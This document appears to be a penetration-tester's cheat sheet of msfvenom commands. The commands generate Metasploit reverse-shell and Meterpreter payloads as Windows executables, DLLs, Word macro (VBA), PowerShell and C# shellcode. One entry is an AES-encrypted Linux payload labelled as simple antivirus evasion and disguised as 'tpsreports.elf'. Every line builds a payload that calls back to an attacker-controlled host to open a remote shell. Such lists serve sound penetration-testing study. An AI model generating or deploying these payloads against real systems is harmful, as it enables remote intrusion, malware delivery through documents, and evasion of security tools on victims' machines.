Metasploit Payloads

Non-staged

windows/shell_reverse_tcp

Staged (note the slash)

windows/shell/reverse_tcp

Type

Msfvenom command

Simple non-staged rev cmd

msfvenom -p windows/shell_reverse_tcp LHOST=192.168.220.128 LPORT=443 -f exe -o shell.exe

Meterpreter non-staged rev

msfvenom -p windows/x64/meterpreter_reverse_https LHOST=192.168.220.128 LPORT=443 -f exe -o msfnonstaged.exe

Meterpreter staged 64-bit

msfvenom -p windows/x64/meterpreter/reverse_https LHOST=192.168.220.128 LPORT=443 -f exe -o msfstaged.exe

Meterpreter staged 32-bit (for Word) EXITFUNC thread in handler

msfvenom -p windows/meterpreter/reverse_https LHOST=192.168.220.128 LPORT=443 EXITFUNC=thread -f vbapplication

Meterpreter staged 32 bit (for powershell)

msfvenom -p windows/meterpreter/reverse_https LHOST=192.168.220.128 LPORT=443 EXITFUNC=thread -f ps1

Meterpreter staged 64 bit (for csharp)

msfvenom -p windows/x64/meterpreter/reverse_https LHOST=192.168.220.128 LPORT=443 -f csharp

Meterpreter staged 32 bit (for Word / csharp)

msfvenom -p windows/meterpreter/reverse_https LHOST=192.168.220.128 LPORT=443 -f csharp

Meterpreter staged 64 bit (.dll)

msfvenom -p windows/x64/meterpreter/reverse_https LHOST=192.168.220.128 LPORT=443 -f dll -o met.dll

Simple AV-evasion for Linux

msfvenom -p linux/x64/shell/reverse_tcp LHOST=192.168.45.167 LPORT=443 --encrypt aes256 --encrypt-key fdgdgj93jf43uj983uf498f43 -f elf -o tpsreports.elf

Last updated 2 years ago